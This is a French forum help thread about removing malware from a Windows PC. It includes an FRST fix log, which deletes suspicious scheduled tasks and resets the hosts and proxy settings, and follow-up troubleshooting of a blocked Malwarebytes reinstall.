Task: {0CF3D7FA-6188-4B78-8C1B-A6FF83A125A1} - \{3A4F71C1-6523-4816-A029-1AC99C831258} -> Pas de fichier <==== ATTENTION
c:\Program Files\Microsoft Security Client
Task: {A67423B1-427F-4FF2-AA60-F8096B21AE4A} - System32\Tasks\Microsoft\Microsoft Antimalware\Microsoft Antimalware Scheduled Scan => c:\Program Files\Microsoft Security Client\\MpCmdRun.exe [2016-11-14] (Microsoft Corporation)
Task: {A9EC5320-235C-411A-A8AF-36840860F002} - \{F9D191B2-6123-4EA4-8332-B9106FAF89DA} -> Pas de fichier <==== ATTENTION
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:


Le Point de restauration a été créé avec succès.
Processus fermé avec succès.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{95339A33-8CA2-4755-A69D-E9BED81F09EF} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{95339A33-8CA2-4755-A69D-E9BED81F09EF} => clé supprimé(es) avec succès
C:\Windows\System32\Tasks\Microsoft\Windows\DeviceSettings\Grihish => déplacé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\DeviceSettings\Grihish => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{0CF3D7FA-6188-4B78-8C1B-A6FF83A125A1} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0CF3D7FA-6188-4B78-8C1B-A6FF83A125A1} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{3A4F71C1-6523-4816-A029-1AC99C831258} => clé supprimé(es) avec succès
"c:\Program Files\Microsoft Security Client" => Avertissement: FRST est conçu pour ne pas déplacer ce dossier.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{A67423B1-427F-4FF2-AA60-F8096B21AE4A} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A67423B1-427F-4FF2-AA60-F8096B21AE4A} => clé supprimé(es) avec succès
C:\Windows\System32\Tasks\Microsoft\Microsoft Antimalware\Microsoft Antimalware Scheduled Scan => déplacé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Microsoft Antimalware\Microsoft Antimalware Scheduled Scan => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{A9EC5320-235C-411A-A8AF-36840860F002} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A9EC5320-235C-411A-A8AF-36840860F002} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{F9D191B2-6123-4EA4-8332-B9106FAF89DA} => clé supprimé(es) avec succès
C:\Windows\System32\Drivers\etc\hosts => déplacé(es) avec succès
Hosts restauré(es) avec succès.

========= RemoveProxy: =========

HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valeur supprimé(es) avec succès
HKU\S-1-5-21-2452614800-3455195969-3210789232-1002\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valeur supprimé(es) avec succès
HKU\S-1-5-21-2452614800-3455195969-3210789232-1002\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valeur supprimé(es) avec succès


========= Fin de RemoveProxy: =========


=========== EmptyTemp: ==========

BITS transfer queue => 8388608 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 5017830 B
Java, Flash, Steam htmlcache => 1710 B
Windows/system/drivers => 647396 B
Edge => 0 B
Chrome => 437259 B
Firefox => 0 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Users => 0 B
Default => 0 B
Public => 0 B
ProgramData => 0 B
systemprofile32 => 128 B
LocalService => 0 B
NetworkService => 17854 B
Rena Karena_2 => 2505094 B

RecycleBin => 0 B
EmptyTemp: => 16.2 MB données temporaires supprimées.

================================


Le système a dû redémarrer.

Fin de Fixlog 12:59:09

Messages postés
8
Date d'inscription
jeudi 25 mai 2017
Statut
Membre
Dernière intervention
26 mai 2017

bonjour,

pour finaliser et confirmer le résulta du nettoyage j'ai voulu passe Malwarebytes et adwcleaner.

Tous les deux me renvoient le même message : Erreur du système de fichiers (65535)
Messages postés
180254
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
26 mars 2021
24 195
Supprimer Malwarebytes
Désinstallation + cleaner.
Réinstalle le.
Messages postés
8
Date d'inscription
jeudi 25 mai 2017
Statut
Membre
Dernière intervention
26 mai 2017

désinstallation réussi
cleaner OK

par contre pour l’installation je me retrouve avec le même message qu'au tout début

du : Contrôle de compte d'utilisateur

"Ce programme a été bloqué pour votre protection

Votre administrateur vous a refusé l'exécution de ce programme. Pour plus d'informations, contactez l'administrateur."

j'ai impression que ma chérie a trouver un virus bien coriace
revoici les ficher FRST au cas ou

https://pjjoint.malekal.com/files.php?id=FRST_20170526_s15i14f13o8d10

https://pjjoint.malekal.com/files.php?id=20170526_u7s14h10x7y11

https://pjjoint.malekal.com/files.php?id=20170526_s11l10f15w6d14

merci de votre aide si précieuse

Bel_Iblis
Messages postés
180254
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
26 mars 2021
24 195
Sur ton rapport Addition, Malwarebytes est dans la liste des programmes...

Désactive le contrôle des comptes utilisateur : https://www.commentcamarche.net/informatique/windows/261-desactiver-le-controle-de-compte-d-utilisateur-uac-de-windows/
réinstalle Malwarebytes, prends le bien depuis le site officiel.
réactive le contrôle des comptes.

Veuillez appuyer sur une touche pour continuer la désinfection...
Messages postés
8
Date d'inscription
jeudi 25 mai 2017
Statut
Membre
Dernière intervention
26 mai 2017

mercie

je réalise que j'ai commencé a joué au fainéant

mais me suis rattraper à prés la manip conseiller à l’installation de Malwarebytes j'ai eu ce message:

Runtime Error (at 49:120):
Could not call porc.

mais je suis aller sur le forum de Malwarebytes ou j'ai trouver ça :

1) Appuyez sur Windows Key + R pour afficher la boîte de dialogue d'exécution, tapez certmgr.msc et cliquez sur OK

2) Dans la fenêtre qui apparaît, double-cliquez sur Certificats non autorisés. Si un dossier de certificat existe, cliquez dessus

3) Supprimez tous les certificats sur le côté droit de la fenêtre qui ont Malwarebytes au nom

4) Redémarrez et essayez une réinstallation

_____

et la j'ai pu enfin installer Malwarebytes

Mercie à toi Malekal_morte en espèrent ne plus avoir a te déranger.

Bel_Iblis
Messages postés
180254
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
26 mars 2021
24 195
ok super =)

Supprime le dossier C:\FRST


Quelques conseils :

Pour ne plus te faire avoir.
A lire - Programmes parasites / PUPs : Dossier Adwares/PUPs : programmes indésirables et parasites
(Surtout active les détections LPIs pour détecter les programmes parasites et publicitaires)